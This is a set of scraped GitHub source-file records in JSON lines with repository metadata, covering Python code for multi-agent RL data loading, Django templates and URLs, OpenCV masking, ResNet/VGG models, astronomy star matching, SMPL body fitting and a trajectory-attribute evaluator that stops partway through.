help='Path to save the results.')\n parser.add_argument('-m ', '--model', default='model_c', help='Path of the model.')\n parser.add_argument('-l ', '--log_directory', default='./log', help='Path of the log file.')\n parser.add_argument('-a ', '--max_number_of_agents', default=6, type=int, help='Maximum number of agents')\n parser.add_argument('-tb ', '--train_batch_size', default=1024, type=int, help='Batch size')\n parser.add_argument('-vb ', '--validation_batch_size', default=100, type=int, help='Batch size')\n parser.add_argument('-tt ', '--test_batch_size', default=256, type=int, help='Batch size')\n parser.add_argument('-td', '--training_agents', nargs=\"+\", default=[1,2,3,5,6])\n parser.add_argument('-vd', '--validation_agents', nargs=\"+\", default=[1,2,3,5,6])\n parser.add_argument('-tt', '--test_agents', nargs=\"+\", default=[4])\n parser.add_argument('-hd ', '--hidden_dimension', default=32, type=int, help='Hidden dimension size')\n parser.add_argument('-e ', '--embedding_dimension', default=64, type=int, help='Default Embedding dimension')\n parser.add_argument('-ae ', '--action_embedding_dimension', default=64, type=int, help='Action Embedding dimension')\n parser.add_argument('-oe ', '--observation_embedding_dimension', default=64, type=int, help='Observation Embedding dimension')\n parser.add_argument('-se ', '--state_embedding_dimension', default=64, type=int, help='Sstate Embedding dimension')\n parser.add_argument('-t ', '--training_dataset', default='./data/train.npy', help='Path to training dataset')\n parser.add_argument('-te ', '--test_dataset', default='./data/test.npy', help='Path to test dataset')\n parser.add_argument('-v ', '--validation_dataset', default='./data/val.npy', help='Path to validation dataset')\n parser.add_argument('-hl ', '--hidden_layers', default=3, type=int, help='Number of hidden layers in the MLP')\n parser.add_argument('-nh ', '--n_heads', default=1, type=int, help='Number of attention heads')\n parser.add_argument('-th ', '--threshold', default=1e-2, type=int, help='Threshold to stop training')\n\n\n args = parser.parse_args() \n assert args.model in ['test', 'model_a', 'model_b', 'model_c', 'Feedforward'], \"Not a valid model\"\n\n args.model_dir = f'./{args.save_dir}/{args.model}'\n if not os.path.exists(args.model_dir):\n os.mkdir(args.model_dir)\n os.mkdir(f'{args.model_dir}/log')\n \n\n return args\n\n\ndef prepare_dataloader(data, agents, batch_size, args):\n dataloaders = {}\n for n_agent in agents:\n state = data[n_agent]['state']\n action = data[n_agent]['actions']\n target = data[n_agent]['target']\n dataset = Dataset(state, action, target, args)\n dataloaders[n_agent] = DataLoader(dataset, batch_size = batch_size, shuffle=True, drop_last = True)\n return dataloaders\n\n\n\ndef initialize_dataloader(args, subset=None):\n training_data = np.load(args.training_dataset, allow_pickle=True).item()\n validation_data = np.load(args.validation_dataset, allow_pickle=True).item()\n test_data = np.load(args.test_dataset, allow_pickle=True).item()\n\n args.observation_dimension = training_data[1]['state'][0].shape[1]\n args.action_dimension = training_data[1]['actions'][0].shape[1]\n args.state_dimension = args.max_number_of_agents * args.observation_dimension\n\n train_dataloaders = prepare_dataloader(training_data, args.training_agents, args.train_batch_size, args)\n val_dataloaders = prepare_dataloader(validation_data, args.validation_agents, args.validation_batch_size, args)\n test_dataloaders = prepare_dataloader(test_data, args.test_agents, args.test_batch_size, args)\n\n\n # Truncate the dataset\n # if subset is not None:\n # state_features = state_features[:subset]\n # action_features = action_features[:subset]\n # targets = targets[:subset]\n\n # Model parametersn\n\n # # Prepare into a torch dataset\n # training_dataset = Dataset(state_features, action_features, targets, args) \n # training_dataloader = DataLoader(training_dataset, batch_size=args.batch_size, shuffle=True, drop_last=True) \n \n # validation_dataset = Dataset(val_state_features, val_action_features, val_targets, args) \n # validation_dataloader = DataLoader(validation_dataset, batch_size=args.batch_size, shuffle=True, drop_last = True) \n\n # test_dataset = Dataset(test_state_features, test_action_features, test_targets, args) \n # test_dataloader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=True, drop_last=True) \n\n return train_dataloaders, val_dataloaders, test_dataloaders, args\n\n\nclass Dataset(torch.utils.data.Dataset):\n \n 'Characterizes a dataset for PyTorch'\n def __init__(self, states, actions, targets, args):\n 'Initialization'\n self.states = states\n self.actions= actions\n self.targets = targets\n self.args = args\n\n def __len__(self):\n 'Denotes the total number of samples'\n return len(self.states)\n\n def __getitem__(self, index):\n 'Generates one sample of data'\n # Select sample\n\n if self.args.model == 'model_a':\n state = np.vstack((self.states[index],np.zeros((self.args.max_number_of_agents, self.args.observation_dimension))))[:self.args.max_number_of_agents,:]\n action = np.vstack((self.actions[index],np.zeros((self.args.max_number_of_agents, self.args.action_dimension))))[:self.args.max_number_of_agents,:]\n target = np.vstack((self.targets[index],np.zeros((self.args.max_number_of_agents, self.args.observation_dimension))))[:self.args.max_number_of_agents,:]\n\n # Flatten\n state = state.reshape(1,-1)\n target = target.reshape(1,-1)\n\n elif self.args.model == 'Feedforward':\n state = np.vstack((self.states[index],np.zeros((self.args.max_number_of_agents, self.args.observation_dimension))))[:self.args.max_number_of_agents,:]\n action = np.vstack((self.actions[index],np.zeros((self.args.max_number_of_agents, self.args.action_dimension))))[:self.args.max_number_of_agents,:]\n target = np.vstack((self.targets[index],np.zeros((self.args.max_number_of_agents, self.args.observation_dimension))))[:self.args.max_number_of_agents,:]\n \n elif self.args.model == 'model_b':\n state = self.states[index]\n action = self.actions[index]\n target = self.targets[index]\n \n elif self.args.model == 'model_c':\n state = self.states[index]\n action = self.actions[index]\n target = self.targets[index]\n\n state = state[0].reshape(1,-1)\n target = target[0].reshape(1,-1)\n \n else:\n state, action, target = None, None, None\n\n return state, action, target\n\n\ndef initialize_model(args):\n model_path = f'{args.model_dir}/model.pth'\n if os.path.exists(model_path):\n f = open(f'{args.model_dir}/log/log.txt', 'w')\n f.write(\"Loading Model.\\n\")\n f.close()\n print(f\"Loading model from {model_path}\")\n model = torch.load(f'{model_path}')\n elif args.model == 'Feedforward':\n model = Feedforward(args)\n elif args.model == 'model_a':\n model = model_a(args)\n elif args.model == 'model_b':\n model = model_b(args)\n elif args.model =='model_c':\n model = model_c(args)\n elif args.model == 'test':\n model = test(args)\n else:\n model = None\n assert(False, \"Invalid Entry\")\n \n criterion = torch.nn.L1Loss()\n optimizer = Adam(model.parameters())\n\n return model, criterion, optimizer\n\n\ndef evaluate(model, dataloaders, criterion):\n total_loss = 0\n model.eval()\n n_batches = 0.0\n with torch.no_grad():\n for dataloader in dataloaders.values():\n for observations, actions, target in dataloader:\n prediction = model.forward(observations, actions)\n\n prediction = torch.Tensor(prediction.flatten())\n target = torch.Tensor(target.flatten().float())\n loss = criterion(prediction, target)\n\n total_loss += loss.item()\n n_batches += 1.0\n model.train()\n total_loss = total_loss/ n_batches\n return total_loss\n\n\ndef log(epoch, args, validation_loss=None, training_loss=None, test_loss = None):\n\n if test_loss is not None:\n f = open(f'{args.model_dir}/log/log.txt', 'a')\n f.write(f'Test loss: {test_loss}')\n print(f'Test loss: {test_loss}')\n f.close()\n else:\n # Save to log and print to output\n f = open(f'{args.model_dir}/log/log.txt', 'a')\n f.write(f'iteration {epoch}s Training loss: {training_loss}, validation loss: {validation_loss}\\n')\n print(f'iteration {epoch}s Training loss: {training_loss}, validation loss: {validation_loss}\\n')\n f.close()\n\n\ndef save_model(model, args, epoch):\n f = open(f'{args.model_dir}/log/log.txt', 'a')\n f.write(f\"Saving model on iteration {epoch}\\n\")\n print(f\"Saving model on iteration {epoch}\\n\")\n torch.save(model, f\"{args.model_dir}/model.pth\")\n f.close()","repo_name":"yubryanj/Ad-hoc-MARL","sub_path":"attention_model/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"71959620727","text":"from django import template\nfrom django.urls import reverse\n\nfrom taskmaster.base.utils.navigationBar import linkItem, Icon\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef navigationPanel(request):\n links = [\n linkItem('Home', '', None),\n ]\n\n if request.user.is_authenticated:\n links.append(\n linkItem('Account', '', None, [\n linkItem('Dashboard', reverse('jira:dashboard-view'), Icon('', 'fas fa-chalkboard', '15')),\n linkItem('Teams', reverse('jira:teams-page'), Icon('', 'fa fa-users', '15')),\n linkItem('Projects', reverse('jira:projects-page'), Icon('', 'fas fa-project-diagram', '15')),\n linkItem('Boards', reverse('jira:boards-page'), Icon('', 'far', '15')),\n linkItem('Settings', f\"{reverse('accounts:account-settings')}?tab=profileAndVisibility\", Icon('', 'fa', '15')),\n None,\n linkItem('Logout', reverse('accounts:logout'), Icon('', 'fas fa-sign-out-alt', '15')),\n ]),\n )\n else:\n links.append(\n linkItem('Login / Register', '', None, [\n linkItem('Register', reverse('accounts:register'), Icon('', 'fas fa-user-circle', '20')),\n None,\n linkItem('Login', reverse('accounts:login'), Icon('', 'fas fa-sign-in-alt', '20')),\n ]),\n )\n return links\n","repo_name":"hajam09/taskmaster","sub_path":"accounts/templatetags/templateTags.py","file_name":"templateTags.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26742830638","text":"\"\"\"this is text\"\"\"\ndef triangle():\n \"\"\"this is text\"\"\"\n num1, num2 = int(input()) ** 2, int(input()) ** 2\n num3 = (num1 + num2) ** (1/2)\n if num3 == int(num3):\n print(int(num3))\n else:\n print(\"%.4f\" %num3)\ntriangle()","repo_name":"sagelga/psit-python3","sub_path":"Leisure Problems/LEI_1827Triangle.py","file_name":"LEI_1827Triangle.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34775735545","text":"from django.conf.urls import url\nfrom . import views\nfrom . import ajax\n\n# We are adding a URL called /home\nurlpatterns = [\n url(r'^$', views.home, name='home'),\n url(r'^personas/$', views.indexPersonas, name='personas'),\n url(r'^newPersona/$', views.new_persona, name='newPersona'),\n url(r'^detailPersona/(?P\\d+)/$', views.detailPersona, name='detailPersona'),\n url(r'^deletePersona/(?P\\d+)/$', views.deletePersona, name='deletePersona'),\n]","repo_name":"biocar2001/python-django-temporales-website","sub_path":"temporales/personas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41309309833","text":"import cv2\nimport numpy as np\nimport blur_face_params as bf\n\nimage = bf.image\ncv2.imshow(\"image\", image)\ncv2.waitKey(0)\nprint(image.shape[1])\nprint(image.shape[0])\nmask = np.zeros(image.shape[:2], dtype=np.uint8)\n#print(mask.shape)\ncv2.rectangle(mask,bf.rect_start_pix, bf.rect_end_pix, (256,256,256), -1)\ncv2.imshow(\"mask- extract face\", mask)\ncv2.waitKey(0)\noutputImage = cv2.bitwise_and(image, image, mask=mask)\ncv2.imshow(\"outputImage\", outputImage)\ncv2.waitKey(0)","repo_name":"swethabommisetti/PracticeCode","sub_path":"Masking/MaskingwithBitwiseOperators.py","file_name":"MaskingwithBitwiseOperators.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7094648239","text":"import torchvision\nimport torch\nimport torch.nn as nn\n\nclass ResNet(torchvision.models.ResNet):\n \"\"\"ResNet generalization for CIFAR-like thingies.\n\n This is a minor modification of\n https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py,\n adding additional options.\n \"\"\"\n\n def __init__(self, block, layers, num_classes=2, zero_init_residual=False,\n groups=1, base_width=64, replace_stride_with_dilation=[False, False, False, False],\n norm_layer=torch.nn.BatchNorm2d, strides=[1, 2, 2, 2], initial_conv=[3, 1, 1]):\n \"\"\"Initialize as usual. Layers and strides are scriptable.\"\"\"\n super(torchvision.models.ResNet, self).__init__() # torch.nn.Module\n self._norm_layer = norm_layer\n\n self.dilation = 1\n if len(replace_stride_with_dilation) != 4:\n raise ValueError(\"replace_stride_with_dilation should be None \"\n \"or a 4-element tuple, got {}\".format(replace_stride_with_dilation))\n self.groups = groups\n\n self.inplanes = base_width\n self.base_width = 64 # Do this to circumvent BasicBlock errors. The value is not actually used.\n self.conv1 = torch.nn.Conv2d(3, self.inplanes, kernel_size=initial_conv[0],\n stride=initial_conv[1], padding=initial_conv[2], bias=False)\n self.bn1 = norm_layer(self.inplanes)\n self.relu = torch.nn.ReLU(inplace=True)\n\n layer_list = []\n width = self.inplanes\n for idx, layer in enumerate(layers):\n layer_list.append(self._make_layer(block, width, layer, stride=strides[idx], dilate=replace_stride_with_dilation[idx]))\n width *= 2\n self.layers = torch.nn.Sequential(*layer_list)\n\n self.avgpool = torch.nn.AdaptiveAvgPool2d((1, 1))\n self.fc = torch.nn.Linear(width // 2 * block.expansion, num_classes)\n #self.predict = nn.Sigmoid()\n\n for m in self.modules():\n if isinstance(m, torch.nn.Conv2d):\n torch.nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (torch.nn.BatchNorm2d, torch.nn.GroupNorm)):\n torch.nn.init.constant_(m.weight, 1)\n torch.nn.init.constant_(m.bias, 0)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the arch by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n\n\n\n def _forward_impl(self, x):\n # See note [TorchScript super()]\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n\n x = self.layers(x)\n\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.fc(x) # Sigmoid\n #x = self.predict(x)\n return x\n\nclass VGG(nn.Module):\n\n\n def __init__(self, features, output_dim):\n super().__init__()\n\n self.features = features\n\n self.avgpool = nn.AdaptiveAvgPool2d(7)\n\n self.classifier = nn.Sequential(\n nn.Linear(512 * 7 * 7, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(0.5),\n nn.Linear(4096, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(0.5),\n nn.Linear(4096, output_dim),\n )\n\n def forward(self, x):\n x = self.features(x)\n x = self.avgpool(x)\n h = x.view(x.shape[0], -1)\n x = self.classifier(h)\n return x\n\ndef get_vgg_layers(config, batch_norm):\n\n layers = []\n in_channels = 3\n\n for c in config:\n assert c == 'M' or isinstance(c, int)\n if c == 'M':\n layers += [nn.MaxPool2d(kernel_size=2)]\n else:\n conv2d = nn.Conv2d(in_channels, c, kernel_size=3, padding=1)\n if batch_norm:\n layers += [conv2d, nn.BatchNorm2d(c), nn.ReLU(inplace=True)]\n else:\n layers += [conv2d, nn.ReLU(inplace=True)]\n in_channels = c\n\n return nn.Sequential(*layers)\n\nvgg11_config = [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M']\nvgg16_config = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M']\n\ndef get_model(args, setup=dict(device=torch.device('cpu'), dtype=torch.float)):\n\n model_name = args.model_name[0]\n\n print(model_name)\n in_channels = 3\n initial_conv = [3, 1, 1]\n NUM_CLASSES = 10 if args.dataset != 'CIFAR-Binary' else 1\n\n # Initialize model \n if model_name == 'ResNet18':\n model = ResNet(torchvision.models.resnet.BasicBlock, [2, 2, 2, 2], num_classes=NUM_CLASSES, base_width=64, initial_conv=initial_conv)\n else:\n #elif model_name == 'VGG16':\n vgg_layers = get_vgg_layers(vgg16_config, batch_norm=True)\n model = VGG(vgg_layers, output_dim=NUM_CLASSES)\n #elif model_name == 'MLP':\n # model = MLP()\n\n model.train()\n\n return model\n\n\n","repo_name":"Jimmy-di/camouflage-poisoning","sub_path":"tools/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4973,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"76"} +{"seq_id":"2888776889","text":"from django.test import TestCase\n\nfrom base.models import Task\nfrom base.paginators import TaskPaginator\n\n\nclass PaginatorTest(TestCase):\n fixtures = [\"user.json\", \"base.json\"]\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.object_list = Task.objects.all()\n cls.task_paginator = TaskPaginator(cls.object_list, per_page=1)\n\n def test_get_paginated_context(self):\n db_page_limit = PaginatorTest.object_list.count()\n db_page = PaginatorTest.object_list[:1]\n (\n page_limit,\n page_number,\n page,\n ) = PaginatorTest.task_paginator.get_paginated_context(1)\n\n self.assertEqual(page_limit, db_page_limit)\n self.assertEqual(page_number, 1)\n for task, task_db in zip(page, db_page):\n self.assertEqual(task, task_db)\n","repo_name":"G0udini/todoapp","sub_path":"base/tests/test_paginators.py","file_name":"test_paginators.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6465271702","text":"def calc(n):\n n = ((n / total) * 100)\n return n\n\n\njogadores = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\ntotal = 0\n\nprint('Enquete: Quem foi o melhor jogador?')\nvoto = int(input('Número do jogador (0=fim): '))\n\nwhile voto != 0:\n if 1 <= voto <= 23:\n jogadores[voto - 1] += 1\n total += 1\n else:\n print('Informe um valor entre 1 e 23 ou 0 para sair!')\n voto = int(input('Número do jogador (0=fim): '))\n\nmelhor = 0\n# maior = jogadores.max()\nfor v in jogadores:\n if v > melhor:\n melhor = v\nposi = jogadores.index(melhor) + 1\n\nprint('Resultado da votação:')\nprint('Foram computados', total, 'votos.')\nprint('\\nJogador votos % ')\nfor i in range(23):\n if jogadores[i] > 0:\n print(i + 1, ' ', jogadores[i], ' ', round(calc(jogadores[i]), 2), '%')\n\nprint('O melhor jogador foi o número {} com {} votos, correspondendo a {}% do total de votos'.format(posi, melhor, round(calc(melhor), 2)))\n","repo_name":"rheneaaa/meustrabalhos-python-html-css","sub_path":"exercícios-cisco-python/avaliação01.py","file_name":"avaliação01.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1446178172","text":"import numpy as np\n\nfrom vstarstack.library.stars import describe\n\nclass DescriptorMatcher:\n \"\"\"Match star descriptors\"\"\"\n def __init__(self,\n min_matched_items : int,\n max_angle_diff : float,\n max_vertex_angle_diff : float,\n max_relative_size_diff : float):\n self.min_matched_items = min_matched_items\n self.max_angle_diff = max_angle_diff\n self.max_vertex_angle_diff = max_vertex_angle_diff\n self.max_relative_size_diff = max_relative_size_diff\n\n def _build_match_table(self,\n items1 : list[describe.DescriptorItem],\n items2 : list[describe.DescriptorItem]):\n match_table = {}\n for i, item1 in enumerate(items1):\n match_table[i] = {}\n for j, item2 in enumerate(items2):\n match = item1.compare(item2,\n max_distance_angle_diff=self.max_angle_diff,\n max_vertex_angle_diff=self.max_vertex_angle_diff,\n max_relative_size_diff=self.max_relative_size_diff)\n if match is not np.inf:\n match_table[i][j] = match\n return match_table\n\n def _get_matched_items(self, items1, items2):\n used_second = []\n matches = {}\n match_table = self._build_match_table(items1, items2)\n for i,match in match_table.items():\n if len(match) == 0:\n continue\n minimal = np.inf\n index = None\n for j,match_item in match.items():\n if match_item < minimal and j not in used_second:\n minimal = match_item\n index = j\n if index is not None:\n matches[i] = index\n used_second.append(index)\n return matches\n\n def check_match(self, desc1 : describe.Descriptor, desc2 : describe.Descriptor):\n \"\"\"Compare 2 descriptors\"\"\"\n matches = self._get_matched_items(desc1.items, desc2.items)\n minreq = min([self.min_matched_items, len(desc1.items), len(desc2.items)])\n return len(matches) >= minreq\n\n def build_match(self,\n descs1 : list[describe.Descriptor],\n descs2 : list[describe.Descriptor]) -> dict:\n \"\"\"Find matches between 2 images\"\"\"\n matches = {}\n used_second = []\n for i, desc1 in enumerate(descs1):\n for j, desc2 in enumerate(descs2):\n if j in used_second:\n continue\n if self.check_match(desc1, desc2):\n matches[i] = j\n used_second.append(j)\n break\n return matches\n\ndef select_matching_images(first_item : int, num_of_descs : int, max_compares : int):\n if max_compares == 0 or num_of_descs <= max_compares:\n return range(num_of_descs)\n indexes = []\n for index in range(max_compares):\n indexes.append((index + first_item + 1) % num_of_descs)\n return indexes\n\ndef build_stars_match_table(matcher : DescriptorMatcher,\n descs : list[list[describe.Descriptor]],\n max_compares : int):\n \"\"\"\n Find stars matches between all images\n\n Arguments:\n * matcher - descriptor matcher\n * descs - list of list of descriptors\n * max_compares - maximal amount of compares. unlimited if 0\n\n Function create stars match table\n \"\"\"\n\n matches = {}\n for i, stars1 in enumerate(descs):\n matches[i] = {}\n indexes = select_matching_images(i, len(descs), max_compares)\n for j in indexes:\n if i == j:\n continue\n stars2 = descs[j]\n matches[i][j] = matcher.build_match(stars1, stars2)\n\n return matches\n","repo_name":"vladtcvs/VStarsStack","sub_path":"src/vstarstack/library/stars/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"28139446362","text":"'''\n @FileName : init.py\n @EditTime : 2021-09-19 21:48:33\n @Author : Buzhen Huang\n @Email : hbz@seu.edu.cn\n @Description :\n'''\n\nimport os\nimport os.path as osp\nimport yaml\nimport torch\nimport sys\nimport numpy as np\nfrom utils.data_parser import create_dataset\nfrom utils.utils import JointMapper, load_camera_para, get_rot_trans\nimport smplx\nfrom camera import create_camera\nfrom prior import create_prior\nfrom utils.prior import load_vposer\n\n\ndef init(**kwarg):\n\n setting = {}\n # create folder\n output_folder = kwarg.pop('output_folder')\n output_folder = osp.expandvars(output_folder)\n if not osp.exists(output_folder):\n os.makedirs(output_folder)\n\n # Store the arguments for the current experiment\n conf_fn = osp.join(output_folder, 'conf.yaml')\n with open(conf_fn, 'w') as conf_file:\n yaml.dump(kwarg, conf_file)\n\n result_folder = kwarg.pop('result_folder', 'results')\n result_folder = osp.join(output_folder, result_folder)\n if not osp.exists(result_folder):\n os.makedirs(result_folder)\n\n mesh_folder = kwarg.pop('mesh_folder', 'meshes')\n mesh_folder = osp.join(output_folder, mesh_folder)\n if not osp.exists(mesh_folder):\n os.makedirs(mesh_folder)\n\n out_img_folder = osp.join(output_folder, 'images')\n if not osp.exists(out_img_folder):\n os.makedirs(out_img_folder)\n\n # assert cuda is available\n use_cuda = kwarg.get('use_cuda', True)\n if use_cuda and not torch.cuda.is_available():\n print('CUDA is not available, exiting!')\n sys.exit(-1)\n\n # read gender\n input_gender = kwarg.pop('gender', 'neutral')\n model_type = kwarg.get('model_type')\n if model_type == 'smpllsp':\n assert(input_gender == 'neutral'), 'smpl-lsp model support neutral only'\n\n if model_type == 'smpllsp':\n # the hip joint of smpl is different with 2D annotation predicted by openpose/alphapose, so we use smpl-lsp model to replace\n pose_format = 'lsp14'\n elif model_type == 'smplx':\n pose_format = 'coco25'\n else:\n pose_format = 'coco17' # ! 使用COCO17\n\n global dataset_obj\n dataset_obj = create_dataset(pose_format=pose_format, **kwarg)\n\n float_dtype = kwarg.get('float_dtype', 'float32')\n if float_dtype == 'float64':\n dtype = torch.float64\n elif float_dtype == 'float32':\n dtype = torch.float32\n else:\n raise ValueError('Unknown float type {}, exiting!'.format(float_dtype))\n\n # map smpl joints to 2D keypoints\n joint_mapper = JointMapper(dataset_obj.get_model2data())\n\n model_params = dict(model_path=kwarg.get('model_folder'),\n joint_mapper=joint_mapper,\n create_global_orient=True,\n create_body_pose=not kwarg.get('use_vposer'),\n create_betas=True,\n create_left_hand_pose=False,\n create_right_hand_pose=False,\n create_expression=False,\n create_jaw_pose=False,\n create_leye_pose=False,\n create_reye_pose=False,\n create_transl=True, # set transl in multi-view task --Buzhen Huang 07/31/2019\n create_scale=True,\n dtype=dtype,\n **kwarg)\n\n model = smplx.create_scale(gender=input_gender, **model_params)\n\n # load camera parameters\n cam_params = kwarg.pop('cam_param')\n extris, intris = load_camera_para(cam_params)\n trans, rot = get_rot_trans(extris, photoscan=False)\n\n # Create the camera object\n # create camera\n views = len(extris)\n camera = []\n for v in range(views):\n focal_length = float(intris[v][0][0])\n rotate = torch.tensor(rot[v], dtype=dtype).unsqueeze(0)\n translation = torch.tensor(trans[v], dtype=dtype).unsqueeze(0)\n center = torch.tensor(intris[v][:2, 2], dtype=dtype).unsqueeze(0)\n camera_t = create_camera(focal_length_x=focal_length,\n focal_length_y=focal_length,\n translation=translation,\n rotation=rotate,\n center=center,\n dtype=dtype,\n **kwarg)\n camera.append(camera_t)\n\n # fix rotation and translation of camera\n for cam in camera:\n if hasattr(cam, 'rotation'):\n cam.rotation.requires_grad = False\n if hasattr(cam, 'translation'):\n cam.translation.requires_grad = False\n\n # create prior\n body_pose_prior = create_prior(\n prior_type=kwarg.get('body_prior_type'),\n dtype=dtype,\n **kwarg)\n shape_prior = create_prior(\n prior_type=kwarg.get('shape_prior_type', 'l2'),\n dtype=dtype, **kwarg)\n angle_prior = create_prior(prior_type='angle', dtype=dtype)\n\n if use_cuda and torch.cuda.is_available():\n device = torch.device('cuda')\n\n for cam in camera:\n cam = cam.to(device=device)\n model = model.to(device=device)\n body_pose_prior = body_pose_prior.to(device=device)\n angle_prior = angle_prior.to(device=device)\n shape_prior = shape_prior.to(device=device)\n else:\n device = torch.device('cpu')\n\n # A weight for every joint of the model\n joint_weights = dataset_obj.get_joint_weights().to(device=device,\n dtype=dtype)\n # Add a fake batch dimension for broadcasting\n joint_weights.unsqueeze_(dim=0)\n\n # load vposer\n vposer = None\n pose_embedding = None\n batch_size = 1\n if kwarg.get('use_vposer'):\n vposer_ckpt = osp.expandvars(kwarg.get('prior_folder'))\n vposer = load_vposer(vposer_ckpt, vp_model='snapshot')\n vposer = vposer.to(device=device)\n vposer.eval()\n pose_embedding = torch.zeros([batch_size, 32],\n dtype=dtype, device=device,\n requires_grad=True)\n\n # process fixed parameters\n setting['fix_scale'] = kwarg.get('fix_scale')\n if kwarg.get('fix_scale'):\n setting['fixed_scale'] = np.array(kwarg.get('scale'))\n else:\n setting['fixed_scale'] = None\n if kwarg.get('fix_shape'):\n setting['fixed_shape'] = np.array(kwarg.get('shape'))\n else:\n setting['fixed_shape'] = None\n\n # return setting\n setting['use_3d'] = kwarg.pop(\"use_3d\")\n setting['extrinsics'] = extris\n setting['intrinsics'] = intris\n setting['model'] = model\n setting['dtype'] = dtype\n setting['device'] = device\n setting['vposer'] = vposer\n setting['joints_weight'] = joint_weights\n setting['body_pose_prior'] = body_pose_prior\n setting['shape_prior'] = shape_prior\n setting['angle_prior'] = angle_prior\n setting['cameras'] = camera\n setting['img_folder'] = out_img_folder\n setting['result_folder'] = result_folder\n setting['mesh_folder'] = mesh_folder\n setting['pose_embedding'] = pose_embedding\n setting['batch_size'] = batch_size\n setting['adjustment'] = kwarg.pop(\"adjustment\")\n setting['use_vposer'] = kwarg.pop(\"use_vposer\")\n return dataset_obj, setting","repo_name":"boycehbz/MvSMPLfitting","sub_path":"code/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"76"} +{"seq_id":"36901900849","text":"import os\nfrom collections import defaultdict\n\nimport click\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom dataloader import DataLoader\nfrom evaluation import Evaluation\nfrom util import substring\n\n\nclass Attributes(object):\n def __init__(self, origin_data, origin_xy_data,\n result_data, result_xy_data, config, orign_single_dict, frame_list):\n \"\"\"Init data here\n Args:\n self._origin_data: A dict recording gt data\n self._origin_xy_data: A dict recording gt xy data\n self._result_data: A DataFrame recording pred data\n self._result_xy_data: A DataFrame recording pred xy data\n self._caculate_result: A DataFrame recording result data\n self._cfg: A Config Class recording config\n self._index: A Series recording index\n self._orign_single_dict: A DataFrame recording first pred data(used for making idx)\n self._frame_list: A list recording frame list\n \"\"\"\n self._origin_data = origin_data\n self._origin_xy_data = origin_xy_data\n self._result_data = result_data\n self._result_xy_data = result_xy_data\n self._caculate_result = None\n self._cfg = config\n self._index = self._result_data.index\n self._orign_single_dict = orign_single_dict\n self._frame_list = frame_list\n\n def operate(self):\n \"\"\"Operate Caculating here\n \"\"\"\n self.velocity_mean()\n self.velocity_std()\n self.distance_mean()\n self.distance_std()\n self.direction()\n self.shake()\n self.crowd()\n\n def paint_operate(self, eva, eval_save_path, save_path):\n \"\"\"Operate Painting here\n \"\"\"\n self.paint_velocity_mean(eva, eval_save_path, save_path=save_path)\n self.paint_velocity_std(eva, eval_save_path, save_path=save_path)\n self.paint_direction(eva, eval_save_path, save_path=save_path)\n self.paint_shake(eva, eval_save_path, save_path=save_path)\n self.paint_crowd(eva, eval_save_path, save_path=save_path)\n\n def velocity_mean(self):\n \"\"\"Caculate velocity mean\n \"\"\"\n print(\"===== starting calculate velocity mean =====\")\n vm = []\n result_data = self._result_data.values\n\n for i, each_result_data in enumerate(result_data):\n start_fid = int(each_result_data[1])\n pred_fid = int(each_result_data[2])\n\n each_gt_data = self._origin_xy_data[self._index[i]].reshape(-1, 2)\n now_idx = pred_fid - start_fid\n obs_len = int(each_result_data[3])\n each_gt_data = each_gt_data[(now_idx - obs_len * self._cfg['skip']):\n (now_idx + min((len(each_gt_data) - now_idx)\n // self._cfg['skip'],\n self._cfg['seq']) * self._cfg['skip']):\n self._cfg['skip']]\n x, y = each_gt_data[:, 0], each_gt_data[:, 1]\n d = self.caculate_distance(x, y)\n v = d / (0.1 * self._cfg['skip'])\n vm.append(v.mean())\n vm = pd.DataFrame(np.array(vm), index=self._index, columns=['velocity_mean'])\n self._caculate_result = vm if self._caculate_result is None \\\n else pd.concat([self._caculate_result, vm])\n return vm\n\n def velocity_std(self):\n \"\"\"Caculate velocity std\n \"\"\"\n print(\"===== starting calculate velocity std =====\")\n vs = []\n result_data = self._result_data.values\n for i, each_result_data in enumerate(result_data):\n start_fid = int(each_result_data[1])\n pred_fid = int(each_result_data[2])\n each_gt_data = 